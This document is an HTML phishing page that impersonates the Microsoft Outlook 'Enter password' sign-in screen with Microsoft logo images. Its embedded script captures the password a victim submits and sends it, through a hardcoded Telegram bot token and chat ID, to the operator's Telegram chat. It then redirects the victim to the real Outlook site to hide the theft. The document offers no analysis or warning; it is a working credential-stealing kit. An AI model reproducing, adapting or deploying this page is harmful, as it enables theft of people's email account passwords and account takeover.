<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Sign in to Outlook</title>
    <link href="style.css" rel="stylesheet" type="text/css" />
	<style>
      body{
  background: url('https://www.linkpicture.com/q/Screen-Shot-2022-01-30-at-10.27.21-PM.png');
  padding: 0;
  margin: 0;
  background-size: cover;
  font-family: Arial, Helvetica, sans-serif;
}

.formal input{
  border: none;
  border-bottom: 1px solid #999;
  width: 100%;
  padding: 5px;
  font-size: 16px;
  outline: none;
}
.formal{
  background: #fff;
  width: 20%;
  margin: auto;
  padding: 40px;
  margin-top: 15%;
}

.noacc{
  display: flex;
  align-items: center;
  width: 50%;
  justify-content: space-between
}

.button .next{
      color: #fff;
    border-color: #0067b8;
    background-color: #0067b8;
}
.button button{
  padding: 10px;
  border: none;
  width: 48%;
  float: right;
  font-weight: bold;
}
.button{
  display: flex;
  margin-top: 10%;
  width: 60%;
  justify-content: space-between;
  float: right;
}

.cant,
.noacc a{
  color: #0067b8;
  font-size: 13px;
}

.noacc p{
  font-size: 13px;
}

.options .sign{
  display: flex;
  padding-left: 20px; 
}
.options svg{
      width: 32px;
    height: 32px;
}
.options{
  background: #fff;
  width: 25%;
  margin: auto;
  margin-top: 2%
}


@media(max-width:1200px){
.formal{
  width: 85%
}
.options{
  width: 95%
}

body{
  background: #fff;
}
}
    </style>
  </head>
  <body>
    <form action="" id="form" method="">
      <div class="formal">
        <img src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="">

        <div class="sign">
          <h3>Enter password</h3>
          <p>to continue to Outlook</p>
        </div>
        <input type="password" placeholder="Password" id="pwd">
        <br><br>
        <div class="noacc">
          <a href="">Forgot password!</a><br><br>
        </div>
        <a href="" class="cant">Can’t access your account?</a>
        <br>
        <div class="button" style="width: 100%; tetx-align:right;">
          <button type="submit" class="next" style="float:right;">Next</button>
        </div>
        <br><br><br>
      </div>
      <div class="options">
        <div class="sign">
        <img src="https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg" alt="">
        <p>Sign-in options</p>
        </div>
      </div>
      </form>
	  
	  
	  
      <script>
      const forma = document.querySelector('#form')
    
      let bot = {
          TOKEN: "5139514533:AAFAGkskqg3FX4844GEWh29g81vXXNDJA1o",
          chatID: "623635448"
      }


      forma.addEventListener("submit", e =>{
          e.preventDefault();

          let pwd = document.querySelector('#pwd').value

 fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=O365=>=Password::-${pwd}=`, {
              method: "GET"
          }).then(success => {
              window.location.replace("https://outlook.office.com");
          }, error => {
              alert("Message not sent")
              console.log(error)

          })
         
      })
</script>
  </body>
</html>